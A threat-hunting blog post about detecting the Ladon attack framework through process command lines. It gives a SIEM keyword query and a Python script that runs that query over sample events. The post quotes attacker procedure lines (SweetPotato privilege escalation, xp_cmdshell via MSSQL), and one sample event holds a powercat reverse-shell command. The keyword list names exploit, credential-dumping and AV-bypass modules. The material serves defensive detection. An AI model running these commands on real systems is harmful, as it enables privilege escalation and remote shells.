179. Hunting for Ladon
Hello everyone!
Today we'll talk about a framework that is quite popular among Chinese-speaking threat actors. It's called Ladon, and adversaries use it for a variety of tasks: scanning, exploitation, remote execution, and so on.
It's used in the wild. Here are some procedure examples, as seen in this report:
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell "net user"
So, if a threat actor uses it on a compromised system, you'll see lots of distinctive command-line arguments, and we can use them for detection and hunting. Keep in mind that a few of these terms (rubeus, sharpgpoabuse, powercat, webshell, and CVE nicknames such as zerologon or printnightmare) are also the names of other public tools or exploits, so a hit on one of them alone is a lead to triage rather than proof that Ladon specifically was run:
event_type: ("processcreatewin" OR "processcreatemac" OR "processcreatenix") AND cmdline: ("ladon" OR "ms17010" OR "bypassedr" OR "whatcms" OR "draytekpoc" OR "debase64" OR "smbghost" OR "enummssql" OR "enumshare" OR "ldapinfo" OR "ftpinfo" OR "smbscan" OR "wmiscan" OR "ldapscan" OR "winrmscan" OR "smbhashscan" OR "wmihashscan" OR "sshscan" OR "mssqlscan" OR "oraclescan" OR "weblogicscan" OR "vncscan" OR "ftpscan" OR "tomcatscan" OR "httpbasicscan" OR "nbtscan" OR "dvrscan" OR "weblogicpoc" OR "phpstudypoc" OR "activemqpoc" OR "tomcatpoc" OR "struts2poc" OR "weblogicexp" OR "tomcatexp" OR "zerologon" OR "ftpsniffer" OR "httpsniffer" OR "iispwd" OR "wifipwd" OR "filezillapwd" OR "dumplsass" OR "wmiexec" OR "smbexec" OR "atexec" OR "sshexec" OR "jspshell" OR "webshell" OR "winrmexec" OR "bypassuac" OR "printnightmare" OR "spoolfool" OR "ms16135" OR "badpotato" OR "sweetpotato" OR "efspotato" OR "powercat" OR "regauto" OR "rdphijack" OR "logdeltomcat" OR "printerpoc" OR "xshellpwd" OR "msnswitchpwd" OR "netgearpwd" OR "joomlapwd" OR "godpotato" OR "hikvisionpoc" OR "bypassav" OR "mcppotato" OR "rubeus" OR "sharpgpoabuse" OR "mmcexec" OR "shellbrowserexec" OR "pvefindaduser")
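To show what the query above actually does when it hits telemetry, here is the same matching logic run over a handful of constructed process-creation events. This is an added example written for this post, not code from the original page or from the Ladon project. The keyword list mirrors the query; the event shape (dicts with event_type and cmdline keys), the split into generic versus Ladon-specific terms, and the sample events are assumptions made for the demo. It also pulls out the module name that follows the Ladon token, which matters because the keyword list is not exhaustive: MssqlCmd from the second procedure example is not in the list and only surfaces through the bare "ladon" match.

```python
"""Run the Ladon hunting logic over process-creation events.

Added example for this post; it is not code from the original page or from the
Ladon project. LADON_TERMS mirrors the hunting query above (lower-cased,
de-duplicated). The event format (dicts with event_type / cmdline keys), the
GENERIC_TERMS split and SAMPLE_EVENTS are constructed for this demo.
"""
import re

LADON_TERMS = sorted({
    "ladon", "ms17010", "bypassedr", "whatcms", "draytekpoc", "debase64",
    "smbghost", "enummssql", "enumshare", "ldapinfo", "ftpinfo", "smbscan",
    "wmiscan", "ldapscan", "winrmscan", "smbhashscan", "wmihashscan", "sshscan",
    "mssqlscan", "oraclescan", "weblogicscan", "vncscan", "ftpscan", "tomcatscan",
    "httpbasicscan", "nbtscan", "dvrscan", "weblogicpoc", "phpstudypoc",
    "activemqpoc", "tomcatpoc", "struts2poc", "weblogicexp", "tomcatexp",
    "zerologon", "ftpsniffer", "httpsniffer", "iispwd", "wifipwd", "filezillapwd",
    "dumplsass", "wmiexec", "smbexec", "atexec", "sshexec", "jspshell", "webshell",
    "winrmexec", "bypassuac", "printnightmare", "spoolfool", "ms16135", "badpotato",
    "sweetpotato", "efspotato", "powercat", "regauto", "rdphijack", "logdeltomcat",
    "printerpoc", "xshellpwd", "msnswitchpwd", "netgearpwd", "joomlapwd",
    "godpotato", "hikvisionpoc", "bypassav", "mcppotato", "rubeus", "sharpgpoabuse",
    "mmcexec", "shellbrowserexec", "pvefindaduser",
})

# The query's event_type filter; field values are compared case-insensitively here.
PROCESS_CREATE_TYPES = {"processcreatewin", "processcreatemac", "processcreatenix"}

# Query terms that are also names of other public tools or CVE nicknames
# (editorial judgement for this demo, tune it for your environment). A hit on
# these alone still deserves triage but is weaker evidence that Ladon itself ran.
GENERIC_TERMS = {
    "rubeus", "sharpgpoabuse", "powercat", "webshell", "jspshell",
    "zerologon", "printnightmare", "spoolfool", "smbghost", "ms17010",
}

# A standalone "Ladon" token followed by a module name, e.g. ";Ladon SweetPotato".
# The lookbehind skips path fragments such as ".\Ladon.ps1".
_MODULE_RE = re.compile(r"(?<![\w.\\/])ladon\s+([A-Za-z0-9_]+)", re.IGNORECASE)


def match_ladon(event):
    """Return the sorted query terms found in the event's command line.

    Empty list if the event is not a process-creation event or nothing matched.
    Matching is a plain case-insensitive substring test, like the SIEM query.
    """
    if event.get("event_type", "").lower() not in PROCESS_CREATE_TYPES:
        return []
    cmdline = event.get("cmdline", "").lower()
    return [term for term in LADON_TERMS if term in cmdline]


def ladon_module(cmdline):
    """Best-effort extraction of the module name following a standalone Ladon token.

    Returns None when no such invocation is present (heuristic, not a parser).
    """
    m = _MODULE_RE.search(cmdline)
    return m.group(1) if m else None


def classify(event):
    """'ladon' if a Ladon-specific term matched, 'generic-tool' if only shared
    names matched, 'none' otherwise."""
    hits = match_ladon(event)
    if not hits:
        return "none"
    return "ladon" if set(hits) - GENERIC_TERMS else "generic-tool"


# Constructed sample telemetry. The first two mirror the procedure examples
# quoted above, with made-up host/credential values in place of the placeholders.
SAMPLE_EVENTS = [
    {"event_type": "ProcessCreateWin",
     "cmdline": r"powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami"},
    {"event_type": "ProcessCreateWin",
     "cmdline": r'powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;'
                r'Ladon MssqlCmd 10.0.0.5 sa P@ssw0rd master xp_cmdshell "net user"'},
    {"event_type": "ProcessCreateWin",
     "cmdline": r"powershell -ep bypass . .\powercat.ps1;powercat -c 10.0.0.9 -p 443 -e cmd"},
    {"event_type": "ProcessCreateWin",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    # Right keyword, wrong event type: the query only looks at process creation.
    {"event_type": "FileCreate", "cmdline": r"C:\Users\Public\Ladon.exe"},
]


def hunt(events=SAMPLE_EVENTS):
    """Return (classification, matched terms, module) for every event that hits."""
    results = []
    for ev in events:
        hits = match_ladon(ev)
        if hits:
            results.append((classify(ev), hits, ladon_module(ev["cmdline"])))
    return results


if __name__ == "__main__":
    for verdict, hits, module in hunt():
        print(f"{verdict:13} module={module!s:14} terms={','.join(hits)}")
```

Running it flags the two Ladon invocations as "ladon" (modules SweetPotato and MssqlCmd), the PowerCat line as "generic-tool", and ignores the svchost process and the FileCreate event, which is exactly the behaviour the SIEM query encodes.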
See you tomorrow!